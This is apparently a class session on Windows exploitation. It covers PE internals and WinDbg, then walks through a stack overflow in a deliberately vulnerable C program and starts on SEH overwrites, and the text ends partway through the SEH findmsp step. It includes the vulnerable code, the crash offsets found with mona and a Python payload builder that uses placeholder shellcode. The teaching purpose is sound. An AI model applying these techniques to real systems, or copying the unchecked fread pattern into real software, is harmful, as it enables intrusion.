This session provides a quick intro to Windows land. We will first explore the Windows PE (Portable Executable) file format. For the key elements we will try to point out how it differs from what we know about the ELF format. We will briefly explore how certain parts of a PE file get mapped into memory, as well as how dynamic library calls are resolved, focusing on the elements that matter most for our exploitation needs.
When it comes to exploitation, everything in Windows is more verbose and generally harder. Given that Windows will be featured in only one class, we will not be able to cover bypassing all of its mechanisms. As a target we will use Windows XP (and before you cringe, know that it currently has a 25% market share vs. 6% for Windows 8). As a debugger we will be using WinDbg, because the ones with fancy interfaces and plugins are still stuck in 32-bit land, and when it comes to writing or finding rootkits it's basically all you've got. Initially we will explore what it means to exploit a vanilla stack overflow and how much more complicated Windows shellcode is compared to Linux. Then we will move on to bypassing canary values, and then to exploiting SEH (Structured Exception Handling), as well as its accompanying mitigation strategy called SafeSEH.
This will be done in a DEP- and ASLR-free environment.
The PE file format shares a common ancestor with ELF, the COFF file format, and has been around since Windows NT 3.1. Unlike ELF, it is consistent across all architectures that Windows supports and currently comes in two flavours: PE32 and PE32+ (for 64-bit). A program that needs to interpret the contents of a PE file will find the structure definitions in the WINNT.H header. Below you can see a bird's-eye view of the PE file format and marvel at its size.
In Windows a lot of things constitute a PE file, among which:
Obviously we cannot go through all the elements of the PE file in one sitting, so we are just going to focus on the things that help us figure out what we are looking at in memory.
The good news is that we don't need to know everything about the PE structure for exploitation, so in each important section we will only talk about the things that do help us. Refer to the first link below to view all the elements.
The following image illustrates a rough estimate of what gets loaded into memory
e_lfanew - specifies the file offset of the next header
Signature - "PE" written in ASCII format
FileHeader - the File Header
OptionalHeader - the Optional Header
Machine - states whether it is an x86 (014c) or an x86-64 (8664) binary
TimeDateStamp - Unix-style timestamp (measured from 01.01.1970) applied when the executable was linked
NumberOfSections - states the number of sections that follow
Characteristics - gives us an idea of the type of file we are dealing with, a few of which are:
Magic - states whether it is a PE32 (10B) or a PE32+ (20B) file
AddressOfEntryPoint - specifies the RVA (Relative Virtual Address) where the code will start executing after the loader has finished
SizeOfImage - the size of the contiguous memory that needs to be reserved to load the file in memory
SectionAlignment - the file sections are aligned in memory to this boundary
FileAlignment - the alignment boundary of the section data on disk
ImageBase - the preferred virtual address where the PE file should be loaded
DLLCharacteristics - specifies the important security attributes of the executable and more
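To make the header walk concrete, here is a minimal Python sketch that follows e_lfanew to the PE signature and reads a few of the fields listed above. It parses a tiny synthetic header built by the hypothetical helper `build_demo_headers()`; the field values are invented for illustration and the blob is not a loadable executable. The field offsets are the standard ones for a 32-bit optional header.

```python
import struct


def build_demo_headers():
    """Build a synthetic (not loadable) PE32 header blob. All values are illustrative."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)  # e_lfanew is stored at offset 0x3C
    signature = b"PE\x00\x00"
    # File header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes in total)
    file_header = struct.pack("<HHIIIHH", 0x014C, 3, 0x53E2A7AE, 0, 0, 0xE0, 0x0102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x010B)       # Magic: PE32
    struct.pack_into("<I", optional, 16, 0x1C20)      # AddressOfEntryPoint (RVA)
    struct.pack_into("<I", optional, 28, 0x00400000)  # ImageBase
    return bytes(dos) + signature + file_header + bytes(optional)


def parse_headers(data):
    """Follow e_lfanew and pull out a few fields of interest."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    file_header = e_lfanew + 4
    machine, sections, timestamp = struct.unpack_from("<HHI", data, file_header)
    optional = file_header + 20  # the file header is 20 bytes long
    (magic,) = struct.unpack_from("<H", data, optional)
    (entry_rva,) = struct.unpack_from("<I", data, optional + 16)
    (image_base,) = struct.unpack_from("<I", data, optional + 28)
    return {
        "machine": machine,
        "sections": sections,
        "timestamp": timestamp,
        "magic": magic,
        "entry_rva": entry_rva,
        "image_base": image_base,
    }


headers = parse_headers(build_demo_headers())
# The entry point in memory is ImageBase + AddressOfEntryPoint
print(hex(headers["image_base"] + headers["entry_rva"]))
```

Pointing `parse_headers()` at the first few hundred bytes of a real 32-bit executable should work the same way, since only fixed offsets are read.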
After the headers that we have just listed follows a list of sections. Sections inside a PE file serve a similar purpose to those in the ELF file format. Each section is described by an _IMAGE_SECTION_HEADER entry that holds the following useful information:
Name - the name of the section
VirtualAddress - the RVA of the section, relative to the ImageBase defined in the Optional Header
PointerToRawData - offset from the beginning of the file where the section starts
VirtualSize - the size that the section occupies in memory
SizeOfRawData - the size that the section occupies on disk
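The fields above are enough to translate between what we see in memory (an RVA) and where the same bytes sit on disk. The sketch below shows one way to do it; the `Section` tuple and the two section entries are hypothetical values chosen for the example, not taken from a real binary.

```python
from collections import namedtuple

# Hypothetical, simplified view of an _IMAGE_SECTION_HEADER entry
Section = namedtuple(
    "Section",
    "name virtual_address virtual_size pointer_to_raw_data size_of_raw_data",
)

# Invented section table for illustration only
SECTIONS = [
    Section(".text", 0x1000, 0x0F00, 0x0400, 0x1000),
    Section(".data", 0x3000, 0x0800, 0x1600, 0x0200),
]


def rva_to_file_offset(rva, sections):
    """Map an RVA to a file offset, or return None if it has no bytes on disk."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            delta = rva - s.virtual_address
            if delta >= s.size_of_raw_data:
                # Part of the section exists only in memory (zero-filled by the loader)
                return None
            return s.pointer_to_raw_data + delta
    return None  # the RVA does not fall inside any section
```

For example, with this table `rva_to_file_offset(0x1C20, SECTIONS)` lands in `.text`, while an RVA near the end of `.data` has no backing bytes in the file because VirtualSize is larger than SizeOfRawData.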
The import table is basically Windows's counterpart of the .PLT. It doesn't necessarily work in the same way, but it fills the same role, namely a mechanism for calling external functions at runtime.
OriginalFirstThunk - an RVA to the INT (Import Names Table), which is basically an array of IMAGE_THUNK_DATA structs
FirstThunk - an RVA to the IAT (Import Address Table), also an array of IMAGE_THUNK_DATA structs
Name - an RVA to the name of the module from which the functions will be imported
typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;  // PBYTE
        DWORD Function;         // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;    // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA32;
Initially both the IAT and the INT entries point to an IMAGE_IMPORT_BY_NAME structure, which has the following key elements:
Hint - an index into the export name table of the dynamic library, which the loader tries first before falling back to a search by name
Name - the function name in ASCII, used for name resolution
The INT entries are always interpreted as u1.AddressOfData, that is, as the RVA of an IMAGE_IMPORT_BY_NAME structure. At runtime the IAT entries are resolved by the OS loader and are subsequently interpreted as u1.Function, that is, as the actual memory addresses of the functions at the place where the dynamic library was loaded in the process memory space.
Linux lets you link a library statically by including all its code in the executable. In Windows you can instead fill in the IAT entries at link time, provided that the DLL you are linking against has a specific version. This works in a predictable manner because the PE file format provides an on-disk map for finding the exact position where a library function will be loaded in process memory. To figure out whether the DLL present on disk is the one we bound against, bound imports are used, whose structure is described by IMAGE_BOUND_IMPORT_DESCRIPTOR.
TimeDateStamp - matched against the same field in the Export Address Table of the DLL on disk to verify that the versions match
OffsetModuleName - the offset of the module name, calculated from the beginning of the IMAGE_BOUND_IMPORT_DESCRIPTOR table (not from the image base)
Delay-loaded imports are very close in functionality to the way the .PLT is used to call external functions at runtime. They are used for calling functions in DLLs that will not be available at load time. To achieve this, a list of IMAGE_DELAY_IMPORT_DESCRIPTOR structures is used, out of which the most important elements are:
rvaDLLName - an RVA to the name of the DLL in ASCII
rvaIAT - an RVA to a separate IAT structure
rvaINT - an RVA to a separate INT structure
Initially the delay-loaded IAT entry contains an RVA to some stub code that will basically perform these actions:
1) Check if the DLL has been loaded into memory
2) If not, call the LoadLibrary() function to load the DLL
3) Call the GetProcAddress() function to get the address of the external function as it was loaded into memory
4) Fill in the IAT entry with the function address so that subsequent calls go there directly
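The four steps above can be modelled in a few lines of Python. This is only a toy model of the control flow: `load_library()` and `get_proc_address()` are hypothetical stand-ins for LoadLibrary() and GetProcAddress(), and the "DLL" is just a dictionary of Python callables.

```python
# Hypothetical "DLLs on disk": module name -> {function name: callable}
DLLS_ON_DISK = {"demo.dll": {"add": lambda a, b: a + b}}

loaded_modules = {}  # modules already mapped into our pretend process


def load_library(name):
    """Stand-in for LoadLibrary(): map the module into the process."""
    loaded_modules[name] = DLLS_ON_DISK[name]
    return loaded_modules[name]


def get_proc_address(module, func):
    """Stand-in for GetProcAddress(): find the function inside a loaded module."""
    return module[func]


class DelayIAT:
    """Toy delay-load IAT: every slot starts out pointing at a resolver stub."""

    def __init__(self):
        self.slots = {}
        self.resolutions = 0  # how many times a stub had to do real work

    def bind(self, dll, func):
        def stub(*args):
            module = loaded_modules.get(dll)          # 1) already loaded?
            if module is None:
                module = load_library(dll)            # 2) load it
            target = get_proc_address(module, func)   # 3) resolve the function
            self.slots[(dll, func)] = target          # 4) patch the IAT slot
            self.resolutions += 1
            return target(*args)

        self.slots[(dll, func)] = stub

    def call(self, dll, func, *args):
        return self.slots[(dll, func)](*args)
```

After `iat = DelayIAT(); iat.bind("demo.dll", "add")`, the first `iat.call("demo.dll", "add", 2, 3)` goes through the stub, and every later call hits the patched slot directly.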
For a dynamic library to be useful it must expose an API for calling the functions it implements. Dynamic libraries in Windows do this by using a mechanism called the Export Address Table, which is described by the IMAGE_EXPORT_DIRECTORY struct. The most important elements are:
TimeDateStamp - used by the bound imports mechanism to check the version of the on-disk DLL and figure out whether the bound addresses are still valid
AddressOfFunctions - an RVA that points to the beginning of an array of function RVAs called the EAT (Export Address Table)
AddressOfNames - an RVA that points to the beginning of an array of RVAs to the function names, called the ENT (Export Names Table)
AddressOfNameOrdinals - an RVA that points to the beginning of an array of ordinals
Base - the starting ordinal number; it is subtracted from a function's ordinal to get the zero-indexed offset in the EAT (the entries in the table pointed to by AddressOfNameOrdinals are already zero-indexed)
NumberOfFunctions - the number of functions that can be called by ordinal
NumberOfNames - the number of functions that can be called by name
Currently all the entries in the ENT are sorted, so a simple binary search by name will quickly give us the RVA of the function we are looking for, but in the days of old it wasn't so easy and best practice dictated that you use ordinals, hence the need for the two indexing schemes. To maintain backward compatibility the current scheme still involves using ordinals.
1) Get the index of the name in the ENT, pointed to by AddressOfNames
2) Get the value from the same index in the ordinals table, pointed to by AddressOfNameOrdinals
3) Use the value as an index into the EAT, pointed to by AddressOfFunctions
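The three lookup steps can be sketched as follows. The export directory below is entirely invented (hypothetical names and RVAs), and the sketch assumes, as in step 3, that the ordinals table holds zero-based indexes into the EAT, while Base is only applied when a caller imports by ordinal.

```python
from bisect import bisect_left

# Invented export directory of a small DLL, for illustration only
BASE = 1
EAT = [0x1000, 0x1040, 0x1080, 0x10C0]  # array pointed to by AddressOfFunctions
ENT = ["Alpha", "Beta", "Delta"]        # array pointed to by AddressOfNames (sorted)
ORDINALS = [2, 0, 3]                    # array pointed to by AddressOfNameOrdinals


def lookup_by_name(name):
    """Binary search the ENT, then go through the ordinals table into the EAT."""
    i = bisect_left(ENT, name)              # 1) index of the name in the ENT
    if i == len(ENT) or ENT[i] != name:
        return None                         # not exported by name
    eat_index = ORDINALS[i]                 # 2) same index in the ordinals table
    return EAT[eat_index]                   # 3) index into the EAT


def lookup_by_ordinal(ordinal):
    """Import by ordinal: subtract Base to get the zero-based EAT index."""
    index = ordinal - BASE
    if not 0 <= index < len(EAT):
        return None
    return EAT[index]
```

Note that the EAT has four entries but only three names: the function at EAT index 1 can only be reached by ordinal, which is why both indexing schemes still exist.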
Each PE specifies a base address as a preference for where it wants to be loaded into memory. As more DLLs get loaded into memory, the possibility of the same virtual address being requested by multiple libraries gets higher. When that happens the loader places the image somewhere else and has to patch every absolute address stored inside it, which is what relocations are for. In ELF, relocations are present in many structures; in Windows there is just a standard section called .reloc. Relocations are stored in an array of IMAGE_BASE_RELOCATION structures.
typedef struct _IMAGE_BASE_RELOCATION {
    DWORD VirtualAddress;
    DWORD SizeOfBlock;
} IMAGE_BASE_RELOCATION;
After each relocation structure we find an array of 16-bit values that specify where and how each relocation will be applied. The first four bits hold an IMAGE_REL_BASED_xxx value that states how the relocation will be applied, and the last 12 bits are interpreted according to that type. The most used one is IMAGE_REL_BASED_HIGHLOW, which means that the relocation is applied to the 32-bit value located at VirtualAddress + the lower 12 bits.
VirtualAddress - the RVA to which the relocations in the block are relative
SizeOfBlock - the total size of the block in bytes: the size of the structure itself plus one WORD (16 bits) for each relocation target
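As a rough sketch of how one relocation block is consumed, the Python below decodes the 16-bit entries and applies IMAGE_REL_BASED_HIGHLOW fixups to an image held in a `bytearray` indexed by RVA. The block, the image contents and the new base address are invented for the example; the function name `apply_relocation_block` is hypothetical.

```python
import struct

IMAGE_REL_BASED_ABSOLUTE = 0  # padding entry, nothing to patch
IMAGE_REL_BASED_HIGHLOW = 3   # add the full 32-bit delta to the DWORD at the target


def apply_relocation_block(image, block, delta):
    """Apply one IMAGE_BASE_RELOCATION block to `image` (a bytearray indexed by RVA)."""
    page_rva, size_of_block = struct.unpack_from("<II", block, 0)
    count = (size_of_block - 8) // 2          # 8-byte header, then 16-bit entries
    entries = struct.unpack_from("<%dH" % count, block, 8)
    patched = []
    for entry in entries:
        rel_type = entry >> 12                # upper 4 bits: IMAGE_REL_BASED_xxx
        offset = entry & 0x0FFF               # lower 12 bits: offset inside the page
        if rel_type == IMAGE_REL_BASED_ABSOLUTE:
            continue
        if rel_type != IMAGE_REL_BASED_HIGHLOW:
            raise NotImplementedError("relocation type %d" % rel_type)
        target = page_rva + offset
        (value,) = struct.unpack_from("<I", image, target)
        struct.pack_into("<I", image, target, (value + delta) & 0xFFFFFFFF)
        patched.append(target)
    return patched


# Invented example: an image preferring 0x00400000 ends up loaded at 0x00A00000
image = bytearray(0x2000)
struct.pack_into("<I", image, 0x1C2A, 0x004022C8)   # an absolute address inside the code
block = struct.pack("<IIHH", 0x1000, 12, (IMAGE_REL_BASED_HIGHLOW << 12) | 0xC2A, 0)
patched = apply_relocation_block(image, block, 0x00A00000 - 0x00400000)
```

The delta is simply the actual load address minus the preferred ImageBase, so an image loaded at its preferred address needs no patching at all.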
When an executable file gets loaded into memory, aside from the elements that are mapped from the PE file on disk, two very important structures get created in memory.
Every process is represented in kernel space by an EPROCESS structure, which in turn references several ETHREAD structures, one for each thread. These in turn point to the PEB and TEB structures in user space, which contain some of the following information.
PEB (Process Environment Block)
TEB (Thread Environment Block)
As mentioned previously, there are a lot of fancy tools out there like Immunity and OllyDbg, but WinDbg is the most powerful and complete, being currently the only solution if you want to debug kernel stuff. And because your debugging skill is directly proportional to your exploitation skill, a tool like WinDbg is the only way to go.
For exploitation the following setup is recommended:
Disassembly - actively disassembles the code as EIP moves
Memory - it is usually recommended that you point it at ESP so you can actively monitor the stack
Registers - it is customizable
Command - the command window
You can add or remove windows from the View menu as you wish. To save a layout, open WinDbg without attaching to a process, set up the windows and go to File > Save Workspace. When you attach to a process or just start one in WinDbg, you can go to File > Open Workspace and instantly load all the process data into the workspace you wish.
When starting up windbg from the command line, some of the following flags are important:
-QY - suppresses the “Save Workspace?” dialog box and automatically saves workspaces
-c - specifies a semicolon-separated list of commands to be run at startup
windbg -QY SSS_example.exe [program arguments]
For a more complete list of commands:
After you've started a program in windbg, use Ctrl+Shift+F5 to restart it
bp - set a breakpoint that will be removed when restarting
0:000> bp 0x00401c21
bu - set a breakpoint that won't be removed when restarting
t - step into
p - step over
g - run until the next breakpoint or the end
u - disassemble the code starting from a certain address
0:000> u 00401c20
SSS_example!main [c:\class\sss_example\sss_example\sss_example\sss_example.cpp @ 6]:
00401c20 55              push    ebp
00401c21 8bec            mov     ebp,esp
00401c23 81ec04020000    sub     esp,204h
00401c29 68c8224000      push    offset SSS_example!GS_ExceptionPointers+0x8 (004022c8)
00401c2e 8b450c          mov     eax,dword ptr [ebp+0Ch]
00401c31 8b4804          mov     ecx,dword ptr [eax+4]
00401c34 51              push    ecx
00401c35 ff15a8204000    call    dword ptr [SSS_example!_imp__fopen (004020a8)]
? - an excellent operator for performing a lot of things, the most useful being the evaluation of arithmetic expressions on registers and addresses
0:000> ? esp+4
Evaluate expression: 1245040 = 0012ff70
0:000> ? 00401c35 + 0x34
Evaluate expression: 4201577 = 00401c69
dd - dump memory and interpret it as double words
0:000> dd 00401c20
00401c20  81ec8b55 000204ec 22c86800 458b0040
00401c30  04488b0c a815ff51 83004020 458908c4
00401c40  fc7d83fc 68137500 004022cc 20ac15ff
00401c50  c4830040 ffc88304 558b35eb 08428b0c
00401c60  b415ff50 83004020 858904c4 fffffdfc
00401c70  51fc4d8b fdfc958b 6a52ffff 00858d01
00401c80  50fffffe 20a415ff c4830040 8bc03310
00401c90  00c35de5 00000000 00000000 00000000
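The first row of the dd output holds the same bytes that the u command disassembled at 00401c20, only grouped into little-endian double words. A small Python sketch (the helper name `dd_line` is made up) makes the byte swapping explicit:

```python
import struct

# The first 16 opcode bytes of main, copied from the u output:
# 55 | 8bec | 81ec04020000 | 68c8224000 | 8b45...
code = bytes.fromhex("558bec81ec0402000068c82240008b45")


def dd_line(address, data):
    """Format 16 bytes the way dd prints them: four little-endian DWORDs."""
    dwords = struct.unpack("<4I", data[:16])
    return "%08x  %s" % (address, " ".join("%08x" % d for d in dwords))


print(dd_line(0x00401C20, code))
```

So `55 8b ec 81` in memory shows up as `81ec8b55` in the dump, which is worth keeping in mind whenever an address has to be written into an input file byte by byte.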
.hh - open the Windows help listing for any command
a - modify instructions on the fly while the program is executing; you must hit Enter after each instruction, and a final Enter to apply the changes
0:000> a 00401c3e
00401c3e jmp 0x6
jmp 0x6
00401c43
.load - load windbg plugins
!teb - list the TEB information
0:000> !teb
TEB at 7ffdf000
    ExceptionList:        0012ffa8
    StackBase:            00130000
    StackLimit:           00126000
    SubSystemTib:         00000000
    FiberData:            00001e00
    ArbitraryUserPointer: 00000000
    Self:                 7ffdf000
    EnvironmentPointer:   00000000
    ClientId:             00000ccc . 00000d40
    RpcHandle:            00000000
    Tls Storage:          00000000
    PEB Address:          7ffd5000
    LastErrorValue:       0
    LastStatusValue:      c0000135
    Count Owned Locks:    0
    HardErrorMode:        0
!peb - list the PEB information
0:000> !peb
PEB at 7ffd5000
    InheritedAddressSpace:    No
    ReadImageFileExecOptions: No
    BeingDebugged:            Yes
    ImageBaseAddress:         00400000
    Ldr                       00251ea0
    Ldr.Initialized:          Yes
    Ldr.InInitializationOrderModuleList: 00251f58 . 00252170
    Ldr.InLoadOrderModuleList:           00251ee0 . 00252160
    Ldr.InMemoryOrderModuleList:         00251ee8 . 00252168
            Base TimeStamp                     Module
          400000 53e2a7ae Aug 07 01:09:50 2014 C:\class\SSS_example\SSS_example\Debug\SSS_example.exe
        7c900000 4d00f29d Dec 09 17:15:41 2010 C:\WINDOWS\system32\ntdll.dll
        7c800000 49c4f2bb Mar 21 15:59:23 2009 C:\WINDOWS\system32\kernel32.dll
        10200000 488ef6c7 Jul 29 13:53:59 2008 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.DebugCRT_1fc8b3b9a1e18e3b_9.0.30729.1_x-ww_f863c71f\MSVCR90D.dll
    SubSystemData:     00000000
    ProcessHeap:       00150000
    ProcessParameters: 00020000
    CurrentDirectory:  'C:\class\SSS_example\SSS_example\Debug\'
    WindowTitle:  'C:\class\SSS_example\SSS_example\Debug\SSS_example.exe'
    ImageFile:    'C:\class\SSS_example\SSS_example\Debug\SSS_example.exe'
    CommandLine:  'SSS_example.exe C:\attack.bin'
    DllPath:      'C:\class\SSS_example\SSS_example\Debug;C:\WINDOWS\system32;C:\WINDOWS\system;C:\WINDOWS;.;C:\Program Files\Debugging Tools for Windows (x86)\winext\arcade;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Debugging Tools for Windows (x86);c:\Program Files\Microsoft SQL Server\100\Tools\Binn\;c:\Program Files\Microsoft SQL Server\100\DTS\Binn\'
    Environment:  00010000
        =::=::\
        =C:=C:\class\SSS_example\SSS_example\Debug
        ALLUSERSPROFILE=C:\Documents and Settings\All Users
        APPDATA=C:\Documents and Settings\Administrator\Application Data
        CLIENTNAME=Console
        CommonProgramFiles=C:\Program Files\Common Files
        COMPUTERNAME=XP_HOST
        ComSpec=C:\WINDOWS\system32\cmd.exe
        FP_NO_HOST_CHECK=NO
        [output-omitted]
!exchain - list the SEH chain
0:000> !exchain
0012ffa8: SSS_example!_except_handler4+0 (00401a40)
  CRT scope  0, filter: SSS_example!__tmainCRTStartup+1dd (0040131d)
                func:   SSS_example!__tmainCRTStartup+1f8 (00401338)
0012ffe0: kernel32!_except_handler3+0 (7c839aa8)
  CRT scope  0, filter: kernel32!BaseProcessStart+29 (7c8438c2)
                func:   kernel32!BaseProcessStart+3a (7c8438d8)
Invalid exception stack at ffffffff
As we discussed previously, Windows shellcode is not for the faint-hearted. There is no .PLT and no return-to-libc; if you want something, you need to follow the path listed under delay-loaded imports. Specifically, your shellcode needs to check whether the DLL containing the needed function is in memory, call LoadLibrary() if it is not, and then call GetProcAddress(). To get an idea of how much more code that is, below you can find two listings showing first Linux- and then Windows-style shellcode that just echoes “hello world”.
As such, it is highly unfeasible to write your own every time. To this end, the msfpayload Metasploit script is more than useful for providing Windows shellcode for all your exploitation needs.
WinDbg is a very powerful tool, but it wasn't exactly geared toward exploit development. If GDB has PEDA, WinDbg has mona. Mona is a powerful Python script that can be loaded in WinDbg with the help of the Python extension plugin.
To use mona on the current process you are debugging just run:
.load pykd.pyd
0:000> !py mona help
Hold on...
'mona' - Exploit Development Swiss Army Knife - WinDBG (32bit)
Plugin version : 2.0 r494
Written by Corelan - https://www.corelan.be
Project page : https://redmine.corelan.be/projects/mona
[output-omitted]
While using mona a lot of files get created. To stay organised, you should define a separate working directory when you start exploiting a process:
!py mona config -set workingfolder C:\Mona\%p
The above command will store all the generated files in the Mona\process_name folder and also generate a mona.ini file in the directory where the current executable resides, so you don't have to redefine the working folder each time you restart windbg.
By now everybody should be familiar with how a buffer overflow works, so we're not going to get into that. Instead, let's see how we can use mona for exploitation in the fast lane. We run the executable compiled from the following code with no protections activated.
#include <stdio.h>
#include <stdlib.h>   /* atoi */
#include <string.h>
#include <windows.h>

int main(int argc, char **argv)
{
    FILE *fp;
    int bytes_to_read;
    char buf[500];

    fp = fopen(argv[1], "rb");
    if (fp == NULL) {
        printf("Can't open file\n");
        return -1;
    }

    /* Deliberately vulnerable: the length comes from the command line
       and is never checked against sizeof(buf). */
    bytes_to_read = atoi(argv[2]);
    fread(buf, 1, bytes_to_read, fp);

    return 0;
}
It is quite clear that the program is vulnerable to a classic buffer overflow. Using the hex editor of your choice, let's generate a binary file containing 600 bytes of data (here 600 'A' characters, 0x41) and run the executable inside windbg.
windbg -QY basic_vuln.exe C:\attack.bin 600
The output in the Command window in windbg should be something along these lines.
0:000> g
(7ac.3ec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=7855065f edx=003429d0 esi=00000001 edi=00403394
eip=41414141 esp=0012ff84 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???

So now instead of doing the heavy lifting let's put mona to work.

.load pykd.pyd
0:000> !py mona config -set workingfolder C:\Mona\%p
0:000> !py mona pc 700
Hold on...
Creating cyclic pattern of 700 bytes
This should create a special pattern and store it in the pattern.txt file in the C:\Mona\executable_name folder. We open the pattern file, eliminate everything but the pattern, and serve it as input to the vulnerable executable again. After the crash, run the following command:
0:000> !py mona findmsp
Hold on...
[+] Looking for cyclic pattern in memory
    Cyclic pattern (normal) found at 0x00344170 (length 700 bytes)
    Cyclic pattern (normal) found at 0x0012fd7c (length 600 bytes)
[+] Examining registers
    EIP contains normal pattern : 0x41327241 (offset 516)
    ESP (0x0012ff84) points at offset 520 in normal pattern (length 80)
    EBP contains normal pattern : 0x31724130 (offset 512)
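To see where the offsets reported by findmsp come from, here is a small Python sketch that regenerates a cyclic pattern and searches it for a register value. It assumes mona's pattern is the usual Metasploit-style Aa0Aa1Aa2... sequence, which is consistent with the register values in the output; the function names are made up for this example.

```python
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern: Aa0Aa1...Aa9Ab0... (upper, lower, digit triples)."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
    pattern = "".join(triples)
    if length > len(pattern):
        raise ValueError("pattern would repeat at this length")
    return pattern[:length].encode("ascii")


def offset_of_register(value, pattern):
    """Registers hold the bytes in little-endian order, so pack before searching."""
    return pattern.find(struct.pack("<I", value))


pattern = cyclic_pattern(700)
print(offset_of_register(0x41327241, pattern))  # value found in EIP
print(offset_of_register(0x31724130, pattern))  # value found in EBP
```

Because every 4-byte window of the pattern is unique, the position of the register value in the pattern is exactly the number of bytes that precede it in the input file.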
After the crash, mona scans the process memory to figure out where the vulnerable stack buffer is and writes the offsets from the buffer to various structures of interest to the findmsp.txt file in the defined mona working folder. The vulnerable stack buffer is located at 0x0012fd7c, and the address that will overwrite EIP must be positioned at an offset of 516 bytes in the input file. All we have to do now is place the address of the buffer at offset 516 in the file, and the shellcode we wish to execute at the beginning of the file.
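A minimal sketch of how such an input file could be laid out in Python is shown below. The buffer address and the offset are the ones reported by findmsp for this particular run; `build_payload` is a hypothetical helper, and the four 0xCC bytes (int3 breakpoints) are only a placeholder standing in for real shellcode.

```python
import struct

BUFFER_ADDRESS = 0x0012FD7C  # start of the stack buffer, as reported by findmsp
EIP_OFFSET = 516             # offset of the saved return address in the input


def build_payload(shellcode, total_length=600, filler=b"\x90"):
    """Lay out: shellcode, filler up to the return address, buffer address, filler."""
    if len(shellcode) > EIP_OFFSET:
        raise ValueError("shellcode does not fit in front of the return address")
    payload = shellcode + filler * (EIP_OFFSET - len(shellcode))
    payload += struct.pack("<I", BUFFER_ADDRESS)  # little-endian, as seen with dd
    payload += filler * (total_length - len(payload))
    return payload


# Placeholder "shellcode": int3 instructions, so the debugger breaks if we land on it
payload = build_payload(b"\xcc" * 4)
# To try it out, write the bytes to the input file, for example:
# open(r"C:\attack.bin", "wb").write(payload)
```

The address contains a null byte, which is not a problem here because the program reads the file with fread() rather than a string function.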
One of the key protection mechanisms that has also been implemented in Windows is the stack canary. As you already know, these values prevent classic buffer overflows by checking a value that has been placed in the stack frame between the local variables and the return address.
Exception handling is built into the Windows operating system and helps make applications more robust. Even if the program developer has not set up any exception handling, every thread of every process has at least one handler that is set up on thread initialization. Information about exception handlers is stored on the stack in an EXCEPTION_REGISTRATION structure, and a pointer to the first EXCEPTION_REGISTRATION structure is stored in the Thread Environment Block.
But the records of the default SEH handlers are just more entries on the stack. Essentially, if an attacker can write enough data he can overwrite them, and by triggering an exception he can bypass the canary check entirely, because normal execution flow is interrupted before the canary is verified.
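The chain of records can be pictured as a linked list living on the stack. The Python model below walks such a list; the stack is faked as a dictionary of address to DWORD, filled with the record addresses and handlers shown by !exchain earlier (the Next pointers are inferred from the order of that output), and 0x41414141 / 0x42424242 are arbitrary marker values.

```python
END_OF_CHAIN = 0xFFFFFFFF


def walk_seh_chain(memory, first_record):
    """Follow the Next pointers; each record is [Next (4 bytes)][Handler (4 bytes)]."""
    chain = []
    record = first_record
    while record != END_OF_CHAIN and record in memory and record + 4 in memory:
        next_record = memory[record]
        handler = memory[record + 4]
        chain.append((record, handler))
        record = next_record
    return chain


# Fake stack contents modelled on the !exchain output
stack = {
    0x0012FFA8: 0x0012FFE0,    # Next    -> second record
    0x0012FFAC: 0x00401A40,    # Handler -> SSS_example!_except_handler4
    0x0012FFE0: END_OF_CHAIN,  # Next    -> end of chain
    0x0012FFE4: 0x7C839AA8,    # Handler -> kernel32!_except_handler3
}
first = 0x0012FFA8             # the TEB's ExceptionList points here
before = walk_seh_chain(stack, first)

# A stack overflow that reaches the first record replaces both of its fields
stack[0x0012FFA8] = 0x41414141
stack[0x0012FFAC] = 0x42424242
after = walk_seh_chain(stack, first)
```

After the simulated overflow the first handler the dispatcher would call is attacker-controlled, and the rest of the chain is no longer reachable.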
Again let's put mona to work. Just like above let's generate an attack pattern but this time let's use 1000 bytes.
0:000> g
(dac.db0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=000003e7 ecx=00000059 edx=00000000 esi=003443f4 edi=00130000
eip=7855aed8 esp=0012fca4 ebp=0012fcac iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
MSVCR90!memcpy+0xb8:
7855aed8 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> g
(dac.db0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=74413973 edx=7c9032bc esi=00000000 edi=00000000
eip=74413973 esp=0012f8d4 ebp=0012f8f4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
74413973 ??              ???
As we can see, the buffer overflow occurred, but due to the far larger payload an exception was also raised inside the memcpy function, apparently because the copy ran into the end of the stack (edi=00130000). When Windows moved on to call the appropriate exception handler, the handler pointer had already been overwritten. We issue the mona findmsp command and it yields the following output.
0:000> !py mona findmsp
Hold on...
[+] Looking for cyclic pattern in memory
    Cyclic pattern (normal) found at 0x00344170 (length 1000 bytes)
    Cyclic pattern (normal) found at 0x0012fd7c (length 644 bytes)
